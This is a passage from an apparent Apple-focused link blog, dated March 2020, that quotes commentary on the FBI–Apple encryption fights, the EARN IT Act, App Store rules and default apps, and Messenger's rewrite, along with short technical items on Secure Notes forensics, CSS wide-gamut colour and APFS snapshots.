They don’t use the word “backdoor” but that’s what they’re asking for. End-to-end encryption doesn’t allow for backdoors. So what they’re really asking is for Facebook not to use end-to-end encryption. And the only truly secure, truly private encryption for personal communication is end-to-end encryption. So, when you boil it all down and ignore the emotional pleas that would have you believe this is all about protecting children, what they’re really asking is for Facebook not to safeguard the security and privacy of the messaging of billions of people around the world.

Bruce Schneier:

In an extraordinary essay, the former FBI general counsel Jim Baker makes the case for strong encryption over government-mandated backdoors[…] Basically, he argues that the security value of strong encryption greatly outweighs the security value of encryption that can be bypassed.

Pete Williams (MacRumors):

The FBI is asking Apple Inc. to help unlock two iPhones that investigators think were owned by Mohammed Saeed Alshamrani, the man believed to have carried out the shooting attack that killed three people last month at Naval Air Station Pensacola, Florida.

Nick Heer:

As with the San Bernardino case, Apple says that it is cooperating with authorities. But, unlike that case, the FBI hasn’t yet tried to legally compel Apple into, for example, creating a special version of iOS that has no restrictions on passcode attempts. As with that case, it would set a troubling precedent that encryption should be weakened. So far, there is simply no practical or realistic way of doing so without breaking every user’s security.

John Gruber:

Honestly, I don’t think this has anything to do with the Pensacola shooter. I think this is part of a campaign to drum up public support for making true encryption illegal. And if it really is about the Pensacola shooter, the FBI’s leadership doesn’t understand how encryption works, which is disgraceful.

Nick Heer:

Twice now, the U.S. Department of Justice has pushed Apple to help decrypt iPhones involved in high-profile crimes. Twice, Apple has pushed back. And, twice, the popular press has framed these cases in terms that do not help their general-audience readers understand why Apple is refusing demands to cooperate; instead, using language that implicitly helps those who believe that our rights should be compromised to a lowest common denominator.

Juli Clover:

United States President Donald Trump this afternoon weighed in on a disagreement between Apple and the FBI, calling on Apple to “step up to the plate” and “help our great country” by unlocking the iPhones used by Florida shooter Mohammed Saeed Alshamrani.

Trump said that the U.S. is “helping Apple all of the time” but Apple refuses to “unlock” smartphones used by “killers, drug dealers and other violent criminal elements.”

Rene Ritchie:

So, what’s critical is to step back and really look at what’s being asked for here. No more secrets. The ability to get into not just a single criminal’s phone, but everybody’s phone. Yours and mine. And the ability for not just the FBI to get into it, but everybody. Foreign agencies and criminals.

John Gruber:

The big question remains unclear in all this coverage: did Apple refuse the DOJ’s request, or are they unable — technically — to fulfill the request? The DOJ continues to talk as though this is something Apple could do but refuses to.

Nick Heer:

To be clear, my iPhone still prompted for its passcode when the update had finished its installation process. This did not magically unlock my iPhone. It also doesn’t prove that passcode preferences could be changed without first entering the existing valid passcode.

But it did prove the existence of one channel where an iPhone could be forced to update to a compromised version of iOS. One that would be catastrophic in its implications for iPhones today, into the future, and for encrypted data in its entirety. It is possible; it is terrible.

David Sparks:

Apple sells into a lot of countries. Any one of them could require they install a back door as a condition of access to the market. Apple’s principals are on a collision course with a massive loss of income. Is it just a question of time before governmental regulation and market pressures make this period of time, where all citizens have relatively secured data and communications, only a temporary phase? I sure hope not.

Nick Heer:

Sparks is right: there will come a time that Apple will need to choose whether it will stand behind strong privacy and security, or if the monetary cost of doing so is simply too high.

Tim Hardwick (9to5Mac, Hacker News):

New questions have been raised about the FBI’s latest request that Apple break its iPhone encryption, after Forbes uncovered a search warrant strongly indicating that federal agents already have tools that can access data on Apple’s latest iPhone models.

William Gallagher:

Republican Senator Lindsey Graham is behind a draft bipartisan bill called the ‘Eliminating Abusive and Rampant Neglect of Interactive Technologies Act of 2019’ or EARN IT. Its stated aims are to “develop recommended best practices… regarding the prevention of online child exploitation.” However, the methods Graham proposes would effectively ban all end-to-end encryption.

Joe Rossignol:

FBI officials have still not managed to unlock a passcode-protected iPhone that investigators believe was owned by Mohammed Saeed Alshamrani, the perpetrator of a mass shooting at a Naval Air Station in Florida in December.

The disclosure was made by FBI director Christopher Wray at a House Judiciary Committee hearing today, according to Bloomberg. Wray told Rep. Matt Gaetz (R-FL) that the FBI is “currently engaged with Apple hoping to see if we can get better help from them so we can get access to that phone,” the report claims.

Tim Hardwick:

The director general of Britain’s Security Service is arguing for “exceptional access” to encrypted messages, in the ongoing battle between authorities and technology companies, reports The Guardian.

Matthew Green:

Yesterday a bipartisan group of U.S. Senators introduced a new bill called the EARN IT act. On its face, the bill seems like a bit of inside baseball having to do with legal liability for information service providers. In reality, it represents a sophisticated and direct governmental attack on the right of Americans to communicate privately.

I can’t stress how dangerous this bill is, though others have tried. In this post I’m going to try to do my best to explain why it scares me.

Previously:

Update (2020-03-27): Bruce Schneier:

Prepare for another attack on encryption in the U.S. The EARN-IT Act purports to be about protecting children from predation, but it's really about forcing the tech companies to break their encryption schemes[…]

Apple to Settle US iPhone Throttling Lawsuit

Benjamin Mayo (MacRumors, Hacker News):

Apple is set to pay up to $500 million to settle a United States lawsuit over the iPhone battery performance throttling debacle of 2018.

Via Reuters, Apple agreed to a preliminary settlement in legal documents filed on Friday. The company denied wrongdoing but said it settled to avoid lengthy court proceedings. The monetary suit is equivalent to $25 per impacted iPhone.

If you unnecessarily spent hundreds of dollars to get new phone—because of a design flaw that made the battery not last very long and a lack of communication that obscured the reason your old phone was slow—you get less than the temporarily discounted cost of a new battery.

Jon Brodkin:

The judge in the case still has to decide whether the settlement is fair, reasonable, and adequate. A hearing is scheduled for April 3.

[…]

To identify people who are eligible for payments, the settlement says that “Apple will provide the Settlement Administrator with the email address of record on the Apple ID account of the members of the Settlement Class, as well as names, mailing addresses, and relevant iPhone serial numbers.” The settlement administrator would then contact those people via email or paper mail. Additionally, “A copy of the Class Notice, together with the Claim Form and various Court orders and other filings, will be posted and available for download on the Settlement Website. Finally, the Parties may jointly agree to provide additional notice with approval from the Court.”

Samuel Gibbs (Hacker News):

Apple and Samsung are being fined €10m and €5m respectively in Italy for the “planned obsolescence” of their smartphones.

An investigation launched in January by the nation’s competition authority found that certain smartphone software updates had a negative effect on the performance of the devices.

Believed to be the first ruling of its kind against smartphone manufacturers, the investigation followed accusations operating system updates for older phones slowed them down, thereby encouraging the purchase of new phones.

Previously:

Update (2022-12-02): Juli Clover (in November 2020):

The investigation has now concluded, and Apple has opted to pay $113 million to settle the matter, reports The Washington Post. Apple has also agreed to be more transparent about similar changes to iOS devices in the future, providing more detail about battery health and power management.

See also: NPR, Hacker News.

Friday, March 6, 2020

iOS Default Apps and Competing With Built-in Apps

Charlie Sorrel:

In iPadOS and iOS 13, you can kinda replace the stock Apple apps on your iPhone or iPad. For instance, anytime you tap the Mail icon, Spark could launch instead. Or, and this is probably the most useful, when you tap the lock-screen shortcut for the Camera app, you could launch Halide instead.

[…]

Here’s how it works. You make a Shortcuts automation that is triggered when you open the stock Camera app. When triggered, it opens the camera app of your choice.

Mark Gurman:

The issue has become more prevalent as Apple’s selection of apps has grown. In 2007, the iPhone had 17 pre-installed apps. Today, there are 38. And since the App Store launched in 2008, Apple has never let consumers set a third-party app as a default option, unlike on Android, Windows, and Apple’s own macOS computer operating system. Android users can pick Firefox as their go-to browser relatively easily, for instance.

A House antitrust panel wrote to Apple recently to demand executive communications relating to iPhone default apps. The lawmakers want to learn about the company’s policies on whether iPhone users can set non-Apple apps as defaults in categories including web browsers, maps, email and music.

“This sounds like Microsoft in the 90s,” said David Reichenberg, an antitrust lawyer at Cozen O’Connor.

Microsoft did let you set a different default browser, and different browsers were allowed to provide their own rendering engines, unlike on iOS.

Joe Rossignol:

Apple plans to release a software update later this year that will make Siri more flexible with third-party messaging apps like WhatsApp, Skype, and Facebook Messenger, the company told Bloomberg’s Mark Gurman.

[…]

It will still not be possible to straight-up set third-party apps as default on an iPhone. Instead, the report claims Siri will decide which messaging app to use based on interactions with specific contacts.

Mark Gurman:

An Apple spokesman provided the following statement:

[…] In the few categories where Apple also has an app, we have many successful competitors and we’re proud that their success is responsible for almost 2 million U.S. jobs in a thriving multibillion dollar market for developers. Our North Star is always to create the best products for our customers and that is why iPhone has the highest customer satisfaction in the industry.

Apple-made apps that are pre-installed on iPhones represent only 0.00002% of the roughly 2 million apps in the App Store, the company also noted.

[…]

It offers developers free marketing in the App Store and on social media, gives personalized recommendations to users who might be interested in their apps, and provides advice from the Apple developer-relations team.

Michael Love:

These responses are somewhat infuriating.

Steve Troughton-Smith:

We all know Apple doesn’t play in the App Store on a level playing field; many people excuse this with “it’s their store, they can do what they want”, which I think is trash. If antitrust litigation forces Apple to do right thing, so be it

If you statically analyze Apple’s App Store apps (like I’ve had to do for experimentation with marzipanify), you’ll find that almost none of them would pass App Review if submitted by an external developer. They get all kinds of private API access and special entitlements

Setting app defaults is just the start of the story; even as the default app, it will be hard to compete fairly with the special privileges Apple grants its own apps

The question is a totally legit one: does Apple compete fairly with apps on its App Store? All of us developers know the answer is ‘of course not’. Many users might know this too. Detractors attack the question instead of the facts behind it because that’s all you can do

Does Apple empower developers? Heck yes. Have they created entire new industries and millions of jobs? For sure. Is iOS a great platform to develop for? Absolutely! Two things can be true at the same time; Apple giveth, Apple competeth unfairly

As a developer, I’m afraid that even antitrust litigation will miss the forest for the trees, and only address setting default apps on iOS, which would be an easy token gesture for Apple to give and wouldn’t really address the underlying problem

I have literally had Apple reject an App Store app of mine (with a ‘never gonna happen’) only to introduce one a few months later with the same app name, icon and purpose 😂 (that was ‘Files’). Apple even gets to unfairly compete with not-yet-released apps

Yoav Weiss:

This happened to me too on watchOS. I submitted an app that displayed multiple swipeable white screens and acted as a flashlight on your wrist. Apple called and said “too many flashlight apps for iPhone”. Me: this is for ᴡᴀᴛᴄʜ. Apple: behold! watchOS 4 with flashlight!

Andrew Chidden:

Apple also loves picking favorites. One WWDC showcased our competitors with a critical feature previously removed from watchOS. Prior to WWDC Apple told us to pound sand when we asked about the feature, so we had already pivoted the team away.

I’m now at a company that Apple “likes”, and the difference is striking. We know about certain things well in advance, our app is shown on stage + Apple.com, and we don’t get blocked from the App Store for half the year.

Eric Lewis:

This is 100% true, I got away with some amazing stuff with my relationship with Apple. Including background location in a way beyond anything they’d ever allow.

David Barnard:

The problem I have is when Apple doesn’t allow 3rd party developers to compete even when that competition wouldn’t cause security or privacy issues.

The example I gave @markgurman on that was my @Timer app. I’ve begged Apple for the critical alerts entitlement so that my timers can compete with the system timer in alerting people even when the mute switch is on or volume turned down. I get so many confused support emails.

And as I complained earlier this summer, @LaunchCenterPro pioneered the use of NFC stickers for triggering shortcuts on iOS, but Shortcuts added NFC with special background access that 3rd party apps don’t get.

What’s ultimately best for iOS customers is a vibrant 3rd party developer community that’s allowed to better compete with 1st party apps AND Apple integrating some things into 1st party apps that just shouldn’t be allowed in 3rd party apps.

Mark Gurman (MacRumors):

The technology giant is discussing whether to let users choose third-party web browser and mail applications as their default options on Apple’s mobile devices, replacing the company’s Safari browser and Mail app, according to people familiar with the matter.

John Gruber:

Users have been clamoring for this ever since the App Store opened. I get why Apple has been cautious about allowing this, but at this point it’s overdue. There are third-party email clients and web browsers that are really good — Apple should celebrate that fact.

[…]

Siri does support third-party apps — you just have to specify them by name: “Hey Siri, play some Pearl Jam from Spotify”. It makes sense that this should be a setting too — if you’re a Spotify user it’s a bit ridiculous that you’re currently required to tack on “from Spotify” with every single request.

Benjamin Mayo:

That small change would cover the use cases of what most people think up when they say they want the ability to set default apps. With such a trivial amount of work involved, that is probably what Apple will do. Competition regulators would probably be appeased by it. However, if you were actually trying to design a system that treated third-party and first-party apps as equals, there’s a lot further to go.

Apple’s stock apps have a lot of privileged system behaviours. For instance, Mail gets to poll the server for new emails on a regular schedule. You can go into Settings and set to check for new mail as often as once every every fifteen minutes. Third-party email apps can only use the sanctioned background refresh APIs, which throttle updates significantly and do not have any guarantees of regularity. This means the majority of third-party email apps have to be backed by a cloud service that checks inboxes and sends new mail push notifications to the device. Apple Mail also has deep and granular options for notification preferences; a user can choose how and where notifications appear on a per-mailbox basis, and do things like let messages from VIP contacts hit the lock screen whilst sending everything else silently to Notification Centre. No App Store app has the capability to do that stuff.

Jason Snell:

The Files app never wants to let you open a bunch of file types directly in an external editor. PDFs and audio and video files? Forget it—those open in Quick Look if you tap on them or tap Open in the Get Info view (which is the same view that appears if you tap on a file when you’re in column view). To open these files, you need to choose Share and then send them to another app.

For other file types, you can indeed set a default—so long as the app in question supports opening files directly. To do this, you tap and hold on a file, then choose Share from the resulting contextual menu. From the resulting share sheet, choose an app from the list of apps at the very top, or swipe all the way to the end of the list and tap More to see even more options. What you want is an option to “Open in [name of app].”

John Gruber:

This whole thing about being able to map a default handler for file types — but not PDFs or audio or video — is bananas. Bananas that even Jason Snell didn’t know about it, bananas that PDFs and AV files are special-case locked to Quick View, bananas all around.

Jared Sorge:

If one of the benefits of setting your default browser to (let’s say) Chrome so you have access to all the Chrome things all the time would it be jarring for a user to see Safari inside of their Twitter app when they tap on a link? Would Apple provide some kind of hook inside of SFSafariViewController to actually show the content of a third-party app like this? If I’ve purposefully gone and set Chrome as my default browser then I sure don’t want Safari ever getting in my way.

There’s also similar code around MFMailComposeViewController for sending emails in apps (I use that in Scorebook) as well as MFMessageComposeViewController for sending iMessage or SMS messages. Would they allow users to pick their email or message client and slide up those experiences as well?

Previously:

Buy-Back Programs for iPhones

Jenna Tsui:

Many Apple users know Cult of Mac as a tech news site, but fewer think of it as a site that will buy back Apple gear. In 2015, however, the site launched the Cult of Mac Buy-Back Program, which claims to give people more money for their Apple products than other, less-specific sites like Gazelle. You don’t have to worry about Cult of Mac publisher Leander Kahney inspecting old iPhones himself; the program is white-labeled through MyPhones Unlimited, an Arkansas-based recycler.

[…]

Simply Mac is an independent Apple retailer with locations throughout the United States. Its Simple Trade program is another option for those who prefer to trade in an iPhone in person but don’t have an Apple Store near them. When taking this approach, you receive your buy-back quote after a Simply Mac representative evaluates the device in person. Unfortunately, trade-ins are accepted only in Simply Mac stores.

[…]

However, not all iPhones are fed to Daisy. Apple clarified that Daisy works only with select used iPhones from the company’s trade-in program, as well as those sourced from Best Buy’s recycling initiative in the United States and KPN stores in the Netherlands. […] If it seems that Apple isn’t being entirely forthcoming, the other two companies are even less specific about what happens to old phones. Both Cult of Mac and Simply Mac sell refurbished phones when possible, but neither company says where.

The Gazelle prices are always a bit lower than I’d like, but they make the process very easy.

Previously:

The Decimation of Safari Extensions

Jeff Johnson:

As a result of the change in format from safariextz to app, Safari extensions have been decimated. There are significantly fewer Safari extensions available. The developer program membership cost factor is obvious, so I won’t spend any more time discussing that. I believe that the biggest barrier now to creating Safari extensions is not money but developer expertise. To create an extension for Firefox, Chrome, or any browser based on Chromium — Microsoft Edge, Brave, Opera, Vivaldi — you just need to know JavaScript, CSS, and HTML. In other words, almost any web developer in the world can create an extension for almost any web browser in the world. All these worlds are yours… except Safari! Attempt no landing there. Safari is unique, unprecedented in its extension requirements. Safari extension developers still have to know web development, but they also have to know native Mac development.

[…]

If you’re wondering why your favorite old Safari extension hasn’t been ported to a new Safari app extension, the reason isn’t necessarily just lack of native Mac development expertise by the developer. Even though an app extension still uses JavaScript and CSS like a safariextz, the new API is not the same as the old API. Developers can’t simply take the old JavaScript and stick it inside a Mac app bundle, that’s not how it works. The new SafariServices API is simply not as powerful as the old Safari JavaScript API. There are things an extension could do in the past that it can no longer do.

Brian Krebs (Hacker News):

The incident is a reminder that browser extensions — however useful or fun they may seem when you install them — typically have a great deal of power and can effectively read and/or write all data in your browsing sessions. And as we’ll see, it’s not uncommon for extension makers to sell or lease their user base to shady advertising firms, or in some cases abandon them to outright cybercriminals.

As far as I know, the new Safari extensions model doesn’t fix this problem. I don’t want to run any extensions that have access to both the full webpage contents and the ability to send my information to a server. The extension runs in its own process, and thus I get a Little Snitch alert if it tries to make a network connection. But the extension could also modify the page content to make network connections on its behalf, and then this would not be caught by Little Snitch. So it still seems like the only way to be sure an extension is safe is to read its JavaScript source.

Previously:

The Apollo Guidance Computer

Wojtek Pietrusiewicz:

As you can see, the DSKY has a black keypad with white legends, yellow indicator lights, and a green electroluminescent seven-segment display. Commands were entered numerically, as two-digit numbers — called Verb and Noun. The first one represented the action being issued, while the second represented the data that would be changed.

He’s designed some keyboard kits using to commemorate the 50th anniversary of Apollo 11.

One of my goals was to use the legends and values from DSKY’s various keys and indicators, in place of traditional modifier legends. This in turn led me to a decision to use stock GMK colours, to make everything easier and more affordable.

Ken Shirriff (via Maxime Chevalier-Boisvert):

The Launch Vehicle Digital Computer (LVDC) had a key role in the Apollo Moon mission, guiding and controlling the Saturn V rocket. Like most computers of the era, it used core memory, storing data in tiny magnetic cores. In this article, I take a close look at an LVDC core memory module from Steve Jurvetson’s collection. This memory module was technologically advanced for the mid-1960s, using surface-mount components, hybrid modules, and flexible connectors that made it an order of magnitude smaller and lighter than mainframe core memories. Even so, this memory stored just 4096 words of 26 bits.

Previously:

Twitter Testing “Fleets”

Ryan Christoffel:

Today Twitter announced a test, limited to Brazil, of a major new feature for the social service: Fleets, which take their inspiration from the Stories feature found on Instagram, Snapchat, and Facebook.

Fleets, short for “fleeting tweets,” live at the top of your timeline just like stories do in other social media apps, and they disappear after 24 hours. Multiple fleets can be written in a day and include text, images, GIFs, and videos, but the way they are interacted with is different than a standard tweet. There’s no way to retweet or reply to someone’s tweet in a public sense; instead, followers can react to a fleet via DM, or a reaction which is sent via DM. Presumably this means that if someone’s DMs are closed, only people they follow can respond to their fleets.

Thursday, March 5, 2020

iCloud and iMessage Experiencing Performance Issues

Benjamin Mayo:

Apple is reporting that some cloud services including iMessage, iCloud Photos and iCloud Drive are currently experiencing technical difficulties.

Even when the status page is green, I receive iMessages out of order and with incorrect timestamps.

New App Store Guidelines for Push Notifications and More

Juli Clover:

Apple today informed developers that it has released updated App Store Review Guidelines, with changes that cover reviews, spam, push notifications, Sign in with Apple, data collection and storage, mobile device management, and more.

Here’s a diff.

Apple:

4.5.4 Push Notifications must not be required for the app to function, and should not be used to send sensitive personal or confidential information. Push Notifications should not be used for promotions or direct marketing purposes unless customers have explicitly opted in to receive them via consent language displayed in your app’s UI, and you provide a method in your app for a user to opt out from receiving such messages. Abuse of these services may result in revocation of your privileges.

Previously, apps were not allowed to send these types of push notifications at all, although Apple’s own apps sent marketing notifications, and it rarely enforced this for third-party apps. Some people are interpreting this relaxing of the rules as a sign that Apple is getting more serious about enforcement.

Curtis Herbert:

A) yay no more “no marketing pushes!? but apple does it!” hot takes

Will Apple’s apps let you opt out, as third-part apps are required to?

Guilherme Rambo:

Having each developer implement their own notification categorization system is a huge waste of resources.

Paul Haddad:

Now that Apple has a policy for marketing push messages they should also add a global toggle for them.

Nick Heer:

The rules are ambiguous about whether users must be able to opt out of push notification ads without entirely disabling notifications for an app.

[…]

Notably, there is also no requirement that push notification ads be a promotion for the app or its features. It seems perfectly legal under these rules for unscrupulous developers to sell push notification ad slots to third parties. Gross.

Kyle Howells:

Apple changing the rules to officially accept defeat on a rule they’ve never actually enforced.

Scott:

Apple is officially an advertising company. They allow marketing spam so they can receive a cut of sales.

Apple:

5.1.1 (ix) Apps that provide services in highly-regulated fields (such as banking and financial services, healthcare, and air travel) or that require sensitive user information should be submitted by a legal entity that provides the services, and not by an individual developer.

So no financial apps that can download your lists of transactions?

Apple (emphasis added):

3.1.3 (b) Multiplatform Services: Apps that operate across multiple platforms may allow users to access content, subscriptions, or features they have acquired in your app on other platforms or your web site, including consumable items in multiplatform games, provided those items are also available as in-app purchases within the app. You must not directly or indirectly target iOS users to use a purchasing method other than in-app purchase, and your general communications about other purchasing methods must not discourage use of in-app purchase.

Is the Mac another platform? Does this mean you can activate an iOS app with the serial number for a Mac app?

Max Seelemann:

That last one bit is very interesting, as it makes is extra clear now that selling subscriptions outside the App Store for App Store apps is A-okay.

Apple:

1.4.4 Apps used to commit or attempt to commit crimes of any kind by helping users evade law enforcement will be rejected. Apps may only display DUI checkpoints that are published by law enforcement agencies, and should never encourage drunk driving or other reckless behavior such as excessive speed.

Damien Petrilli:

Everybody ask Apple to stand for freedom, and instead, Apple double down on rules to help dictatorships. This is clearly targeting the Hong Kong protesters App.

Oddly, the current version on Apple’s site seems to have reverted to the old wording:

1.4.4 Apps may only display DUI checkpoints that are published by law enforcement agencies, and should never encourage drunk driving or other reckless behavior such as excessive speed.

I like this version better, as virtually any app could be used to help commit a crime, e.g. even a basic to-do or messaging app. HKmap Live also had non-criminal uses. Apps shouldn’t be penalized for the ways customers choose to use them.

And there’s a whole new section:

5.6.1 App Store Reviews

App Store customer reviews can be an integral part of the app experience, so you should treat customers with respect when responding to their comments. Keep your responses targeted to the user’s comments and do not include personal information, spam, or marketing in your response.

Use the provided API to prompt users to review your app; this functionality allows customers to provide an App Store rating and review without the inconvenience of leaving your app, and we will disallow custom review prompts.

This seems reasonable.

Previously:

Update (2020-03-06): Juli Clover:

Apple is rejecting apps that are related to the COVID-19 coronavirus that aren’t provided by health organizations or government institutions, according to CNBC.

Four independent developers that spoke to CNBC said that their coronavirus apps, which were designed to let people see stats about which countries have confirmed cases, had been rejected.

One developer was told over the phone by an Apple employee that anything related to the coronavirus needs to be released by an official health organization or government, while another received a notice that “apps with information about current medical information need to be submitted by a recognized institution.”

I don’t think Apple should be in the business of deciding which apps have good health information. Some of the ones that were rejected undoubtedly did. Meanwhile, various world health and governmental organizations, as well as general news sources and forums, have in some cases spread misinformationyet those apps remain welcome in the store.

Benjamin Mayo:

Apple seems to be doing a decent job rejecting health advice apps not published by official institutions, but there is deffo keyword spam going on. Plenty of random games show up when you search for “coronavirus”.

See also: Hacker News.

Update (2020-03-27): See also: App Store Review Guidelines History.

Rewriting Facebook Messenger

Facebook:

To make the Messenger iOS app faster, smaller, and simpler, we rebuilt the architecture and rewrote the entire codebase, which is an incredibly rare undertaking and involved engineers from across the company.

Compared with the previous iOS version, this new Messenger is twice as fast to start and is one-fourth the size. We reduced core Messenger code by 84 percent, from more than 1.7M lines to 360,000.

We accomplished this by using the native OS wherever possible, reusing the UI with dynamic templates powered by SQLite, using SQLite as a universal system, and building a server broker to operate as a universal gateway between Messenger and its server features.

[…]

Historically, coordinating data sharing across features required the development of custom, complex in-memory data caching and transaction subsystems. Transferring this logic between the database and the UI slowed down the app. We decided to forgo that in favor of simply using SQLite and letting it handle concurrency, caching, and transactions. Now, rather than supporting one system to update which friends are active now, another to update changes in profile pictures in your contact list, and another to retrieve the messages you receive, requests for data from the database are self-contained. All the caching, filtering, transactions, and queries are all done in SQLite. The UI merely reflects the tables in the database.

This keeps the logic simple and functional, and it limits the impact on the rest of the app. But we went even further. We developed a single integrated schema for all features. We extended SQLite with the capability of stored procedures, allowing Messenger feature developers to write portable, database-oriented business logic, and finally, we built a platform (MSYS) to orchestrate all access to the database, including queued changes, deferred or retriable tasks, and for data sync support.

Dan Abramov:

Many readers focused on the app being native. That shouldn’t be a surprise. The app was fully native before the rewrite, too! So it’s a native app — and rewritten to a native app. Turns out, squeezing out the last bits of performance is about more than “being 100% native”!

Was this a rewrite from RN? No, Messenger didn’t use React Native at the time it was rewritten.

Again, this is a native app rewritten to a native app. The big change is dropping all of the xplat shared FB infrastructure code (not RN) in favour of a lean core in plain C.

[…]

But the whole point is that “native” doesn’t guarantee “fast”. The old app was native, AND it was slow. The difference is in how they solved their requirements in a creative way. For example, they don’t write “native views” like everyone else to save size — UI is driven by DB!

Facebook’s investment in React Native is as high as ever. The main app has 750+ React Native screens, and it’s used for several standalone apps. It’s not the right tradeoff for Messenger, but this ethos (e.g. lean use of C) inspires a lot of the ongoing React Native work.

Previously:

Project Sandcastle: Android for the iPhone

Corellium (tweet):

The iPhone restricts users to operate inside a sandbox. But when you buy an iPhone, you own the iPhone hardware. Android for the iPhone gives you the freedom to run a different operating system on that hardware.

Android for the iPhone has many exciting practical applications, from forensics research to dual-booting ephemeral devices to combatting e-waste.

The source is here.

Corellium:

By leveraging our virtual devices, along with our deep knowledge of both the Android OS and the iPhone hardware, we were able to rapidly iterate to bring Android to life.

[…]

Unfortunately, Android developers enshrined the 4kB page size in the build system, breaking AArch64 convention; third-party applications containing binary libraries built for these small pages will not be able to start on our Android port and will need to be rebuilt. It’s not intrinsically hard - one or two command-line options - but it can’t be done if all you have is an APK.

Less limiting is the lack of 32-bit code support on our platform. While Android these days requires support for pure 64-bit systems from application developers, the system itself still has moldy chunks of 32-bit only code in unexpected places.

Update (2020-03-06): Isaiah Carew:

this is kind of mind blowing -- running Android on iOS.

i’d prefer the opposite. i’d like to be able to run iOS on generic hardware.

Hiding Easter Eggs in Maps

Zoey Poll (via Paul Kafasis, Hacker News):

Watching a single place evolve over time reveals small histories and granular inconsistencies. Train stations and airports are built, a gunpowder factory disappears for the length of the Cold War. But on certain maps, in Switzerland’s more remote regions, there is also, curiously, a spider, a man’s face, a naked woman, a hiker, a fish, and a marmot. These barely-perceptible apparitions aren’t mistakes, but rather illustrations hidden by the official cartographers at Swisstopo in defiance of their mandate “to reconstitute reality.” Maps published by Swisstopo undergo a rigorous proofreading process, so to find an illicit drawing means that the cartographer has outsmarted his colleagues.

[…]

Errors—both accidental and deliberate—are not uncommon in maps (17th-century California as an island, the omission of Seattle in a 1960s AAA map). Military censors have long transformed nuclear bunkers into nondescript warehouses and routinely pixelate satellite images of sensitive sites. Many maps also contain intentional errors to trap would-be copyright violators. The work of recording reality is particularly vulnerable to plagiarism: if a cartographer is suspected of copying another’s work, he can simply claim to be duplicating the real world— ideally, the two should be the same. Mapmakers often rely on fictitious streets, typically no longer than a block, to differentiate their accounts of the truth (Oxygen Street in Edinburgh, for example).

Previously:

Mac Programming in 2020

In the post-show for ATP 366, John Siracusa discusses adding a bit of interface polish to his SwitchGlass app. What seems like a simple enhancement takes him down a trail of API bugs and limitations, documentation problems, edge cases, heuristics, race conditions, security prompts, and sandboxing.

Previously:

Wednesday, March 4, 2020

Optimizing PDF File Size

Patrik Weiskircher:

However, [incremental saving] also causes the file size to grow and grow and never get smaller. This is especially noticeable if you work with a lot of images. And even if you remove an image, it still is included in the PDF; you only instruct your PDF viewer to not show it again.

[…]

Another nice feature of PDFs is that objects like fonts and images can be shared across pages — a feature that was specifically made in an effort to save on the size of files. This means you can have an image logo on each page and it is only included in the PDF file once.

[…]

So right before we start saving the document, we go through the entire PDF file and collect a list of all the reachable object numbers. Then, when saving the PDF, but before we write out an indirect object, we compare its objects number with the list we collected, and if the object isn’t included, we simply don’t write it out.

I can’t tell from this whether they coalesce duplicate objects or only garbage collect unreferenced ones.

Wide Gamut Color in CSS With Display-P3

Nikita Vasilyev (Hacker News):

WebKit is the only browser engine that supports Display-P3 color as of January 2020.

[…]

One way to provide a fallback is to include the same property with the sRGB color before:

header {
    color: rgb(0, 255, 0);
    color: color(display-p3 0 1 0);
}

Browsers other than WebKit currently parse color(…) as invalid value. CSS properties with invalid values are ignored by the browsers.

Alternatively, you can use @supports feature query.

Apple’s (Not Quite) Secure Notes

Sarah Edwards:

However, the ZSNIPPET column show the partial unencrypted content of this note. This is where potentially sensitive information from the note could be extracted. While I cannot see the full contents of the secure note, I can see the snippet or the first line of the note! I am unable see “The ocean is wet.” in this field.

[…]

I mentioned previously about the ZMARKEDFORDELETION column. When do these entries get deleted? Turns out, a few different ways!

  • Upon exiting Notes on macOS
  • Upon closing the Notes window on macOS
  • Upon swiping up (to go to the home screen) on iOS. Switching to another app does not necessarily delete the entries.

[…]

Due to the nature of how Apple Secure Notes work, it is possible for forensic analysts to acquire information, even if it is currently encrypted.

Besides this, it’s not clear to me that the old unencrypted data will actually be wiped from the SQLite database page when the row is logically deleted. And even then it may persist on disk, in previous blocks for both the database and for Spotlight. All of these problems stem from converting an unencrypted note to be encrypted. It’s better to start out with an empty encrypted note and then add content to it.

In EagleFiler I try to avoid this by encrypting the entire library from the start. The files and database, as well as search indexes, temporary files, Spotlight, and the versions database are only ever written in encrypted form.

Previously:

Tuesday, March 3, 2020

APFS Snapshots and Large Files

Howard Oakley:

Snapshots are more efficient than regular backups. If a single byte changes in a file, the whole of that file has to be copied in the next backup. Snapshots keep only the parts of the file that change, so that the original can be reconstructed. But over time and use of that file, the amount of it which has to be retained to restore its original state inevitably rises up to the limit of the whole file size.

[…]

If you have sufficient free disk space to include VM and other large files in backups and snapshots, then you don’t need to change their location or policies.

To maintain better control of backup storage, you should move VMs and other large files to a separate volume, and add the whole volume to the Time Machine exclude list, or disable snapshots on that volume in Carbon Copy Cloner.

See also:

Previously:

2020 Mac Hardware Rumors

Chance Miller:

But the 14-inch MacBook Pro is said to be just one of the mini-LED products Apple will release in 2020. The others include a 12.9-inch iPad Pro, a 27-inch iMac Pro, a 16-inch MacBook Pro, a 10.2-inch iPad, and a 7.9-inch iPad mini.

Kuo doesn’t offer specific release dates for any of the products other than the iMac Pro, which he says is coming in Q4.

So the 13-inch MacBook Pro will finally get the fixed keyboard, but no word on the MacBook Air.

A Q4 iMac Pro release would mean about 3.5 years between the announcement and the first update.

This is not the pace we’d hoped for.

Update (2020-03-12): Mike Rockwell:

Just a month or two after I started using my [2018] Air, I started having issues with missed and duplicate key presses. I’ve sort-of lived with the annoyance until now because I didn’t have another suitable Mac available to use while my primary machine is out for repair.

Joe Rossignol:

Apple plans to release new MacBook Pro and MacBook Air models with scissor keyboards in the second quarter of 2020, according to a new research note today from analyst Ming-Chi Kuo, obtained by MacRumors.

Joe Rossignol:

Kuo said Apple plans to launch MacBook models with its own custom processors in the fourth quarter of 2020 or the first quarter of 2021.

MacSurfer Shutting Down

MacSurfer:

Not seeing a viable future with subscriptions, MacSurfer and TechNN will cease operations effective immediately. Please allow a few weeks to process forthcoming refunds. If need be, subscription inquiries can be addressed to the Publisher at the bottom of the Homepage.

Thanks kindly for your support, and thanks for the memories...

I’m sad to see this, as it was a great site for many years, and perhaps the best way pre-Twitter to find lots of stories from a wide variety of sites.

Dan Moren:

For many years, they were an invaluable resource, a manageable way to quickly see what was going on in the Apple world without having to subscribe to hundreds of sites and spend literally all of your time trawling headlines.

But as social media and podcasting grew in popularity and RSS and “visiting actual websites” ebbed, MacSurfer struggled to adjust.

Previously:

Update (2020-03-12): Steven Sande:

